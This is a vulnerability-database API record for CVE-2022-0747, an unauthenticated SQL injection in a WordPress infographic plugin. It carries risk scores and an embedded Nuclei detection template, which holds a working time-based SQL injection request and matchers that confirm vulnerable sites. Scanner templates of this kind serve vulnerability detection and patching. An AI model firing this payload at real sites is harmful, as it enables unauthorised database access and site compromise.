{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2022-0747/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2022-0747/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2022-0747/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2022-0747/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2022-0747/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2022-0747"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2022-0747"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.14882,
      "kev": false,
      "percentile": 0.96548
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2022/CVE-2022-0747.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2022-0747\n\ninfo:\n  name: Infographic Maker iList < 4.3.8 - SQL Injection\n  author: theamanrawat\n  severity: critical\n  description: |\n    The Infographic Maker WordPress plugin before 4.3.8 does not validate and escape the post_id parameter before using it in a SQL statement via the qcld_upvote_action AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL Injection.\n  impact: |\n    Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the WordPress site.\n  remediation: Fixed in version 4.3.8\n  reference:\n    - https://wpscan.com/vulnerability/a8575322-c2cf-486a-9c37-71a22167aac3\n    - https://wordpress.org/plugins/infographic-and-list-builder-ilist/\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-0747\n    - https://plugins.trac.wordpress.org/changeset/2684336\n    - https://github.com/ARPSyndicate/cvemon\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2022-0747\n    cwe-id: CWE-89\n    epss-score: 0.14882\n    epss-percentile: 0.96548\n    cpe: cpe:2.3:a:quantumcloud:infographic_maker:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: quantumcloud\n    product: infographic_maker\n    framework: wordpress\n  tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,infographic-and-list-builder-ilist,wpscan,quantumcloud,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        @timeout: 20s\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=qcld_upvote_action&post_id=1+AND+(SELECT+1626+FROM+(SELECT(SLEEP(6)))niPH)\n      - |\n        GET /wp-content/plugins/infographic-and-list-builder-ilist/assets/js/ilist_custom_admin.js HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'duration_1>=6'\n          - 'status_code_2 == 200'\n          - 'contains(content_type_2, \"text/javascript\")'\n          - 'contains(body_2, \"show_ilist_templates\")'\n        condition: and\n# digest: 4a0a00473045022100ab3b5508b912874f670739267b530924c9509ede1be71fb5351367e73ef48a2f02205adc2f4e5acf35098c1570c5479958a193c762ba1219d5e474ad067ea39969fa:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2022-0747"
}